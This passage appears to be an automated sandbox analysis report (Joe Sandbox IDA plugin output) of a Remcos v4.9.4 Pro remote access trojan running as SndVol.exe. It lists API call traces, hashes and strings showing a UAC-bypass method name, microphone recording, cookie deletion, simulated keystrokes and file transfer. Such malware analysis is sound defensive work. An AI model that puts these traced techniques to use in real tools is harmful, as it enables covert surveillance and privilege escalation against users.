                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                • String ID: .part
                                                                • API String ID: 1303771098-3499674018
                                                                • Opcode ID: d230553aec7110adf4e51ba4941b1d94ecbe35f1f5eea66a9c4207c894b51e14
                                                                • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                                • Opcode Fuzzy Hash: d230553aec7110adf4e51ba4941b1d94ecbe35f1f5eea66a9c4207c894b51e14
                                                                • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                                APIs
                                                                • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                                • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Console$Window$AllocOutputShow
                                                                • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                                                • API String ID: 4067487056-3065609815
                                                                • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                                • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                                • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                                • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                                • __freea.LIBCMT ref: 0044AE30
                                                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                • __freea.LIBCMT ref: 0044AE39
                                                                • __freea.LIBCMT ref: 0044AE5E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 3864826663-0
                                                                • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                                                • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                                • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                                                • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                                                APIs
                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                                                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InputSend
                                                                • String ID:
                                                                • API String ID: 3431551938-0
                                                                • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                                • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __freea$__alloca_probe_16_free
                                                                • String ID: a/p$am/pm$zD
                                                                • API String ID: 2936374016-2723203690
                                                                • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                                                • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                                • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                                                • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: udp
                                                                • API String ID: 0-4243565622
                                                                • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                • Instruction ID: df31eabfaf2845e40e535da5efa2eac291ae342b76586d96a8099acd7a878bac
                                                                • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                • Instruction Fuzzy Hash: DD718C70608302CFDB25CF55D484A3AB7E6BF84651F84843EF886C7269EBB4C904CB92
                                                                APIs
                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                                                • __fassign.LIBCMT ref: 0044B479
                                                                • __fassign.LIBCMT ref: 0044B494
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                                                                • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                • String ID:
                                                                • API String ID: 1324828854-0
                                                                • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                                • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: D[E$D[E
                                                                • API String ID: 269201875-3695742444
                                                                • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                                • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                                APIs
                                                                  • Part of subcall function 0536351D: TerminateProcess.KERNEL32(00000000,?,0535E4DC), ref: 0536352D
                                                                  • Part of subcall function 0536351D: WaitForSingleObject.KERNEL32(000000FF,?,0535E4DC), ref: 05363540
                                                                  • Part of subcall function 053643C5: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 053643E1
                                                                  • Part of subcall function 053643C5: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 053643FA
                                                                  • Part of subcall function 053643C5: RegCloseKey.ADVAPI32(?), ref: 05364405
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0535E526
                                                                • ShellExecuteW.SHELL32(00000000,00466108,00000000,00466468,00466468,00000000), ref: 0535E685
                                                                • ExitProcess.KERNEL32 ref: 0535E691
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                • String ID: 8SG$exepath$hdF
                                                                • API String ID: 1913171305-3379396883
                                                                • Opcode ID: 838544f3cf5cb621be9cba50a81bf8f3131868f8d4be70fb518c48cf82230a5f
                                                                • Instruction ID: 86c0e0ae60bf96b69768765774c32b8a791da99e541a2fa2f62a7719ecc23c97
                                                                • Opcode Fuzzy Hash: 838544f3cf5cb621be9cba50a81bf8f3131868f8d4be70fb518c48cf82230a5f
                                                                • Instruction Fuzzy Hash: CA419531B101185BCB18FB60EC98EFF7779BF11620F10516AF806A7090EF256E8ACA55
                                                                APIs
                                                                  • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                                                  • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                                  • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                • _wcslen.LIBCMT ref: 0041B763
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                • API String ID: 3286818993-122982132
                                                                • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                                • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                                • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                                • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                                APIs
                                                                • _strftime.LIBCMT ref: 00401D50
                                                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                • String ID: %Y-%m-%d %H.%M$.wav
                                                                • API String ID: 3809562944-3597965672
                                                                • Opcode ID: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
                                                                • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                                • Opcode Fuzzy Hash: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
                                                                • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                                APIs
                                                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                  • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                • API String ID: 1133728706-4073444585
                                                                • Opcode ID: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                                • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                                • Opcode Fuzzy Hash: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                                • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                                                • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                                • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                                                • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                                APIs
                                                                  • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                                • _free.LIBCMT ref: 00450F48
                                                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                • _free.LIBCMT ref: 00450F53
                                                                • _free.LIBCMT ref: 00450F5E
                                                                • _free.LIBCMT ref: 00450FB2
                                                                • _free.LIBCMT ref: 00450FBD
                                                                • _free.LIBCMT ref: 00450FC8
                                                                • _free.LIBCMT ref: 00450FD3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                                • int.LIBCPMT ref: 00411183
                                                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                • String ID: (mG
                                                                • API String ID: 2536120697-4059303827
                                                                • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                                • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                                • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                                • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                                APIs
                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\SndVol.exe), ref: 004075D0
                                                                  • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                                  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                • CoUninitialize.OLE32 ref: 00407629
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                • String ID: C:\Windows\SysWOW64\SndVol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                • API String ID: 3851391207-991305910
                                                                • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                                • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                                APIs
                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                                • GetLastError.KERNEL32 ref: 0040BAE7
                                                                Strings
                                                                • UserProfile, xrefs: 0040BAAD
                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                                • [Chrome Cookies not found], xrefs: 0040BB01
                                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteErrorFileLast
                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                • API String ID: 2018770650-304995407
                                                                • Opcode ID: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                                • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                                • Opcode Fuzzy Hash: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                                • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0536E143
                                                                  • Part of subcall function 0536E1DC: RegisterClassExA.USER32(00000030), ref: 0536E228
                                                                  • Part of subcall function 0536E1DC: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0536E243
                                                                  • Part of subcall function 0536E1DC: GetLastError.KERNEL32 ref: 0536E24D
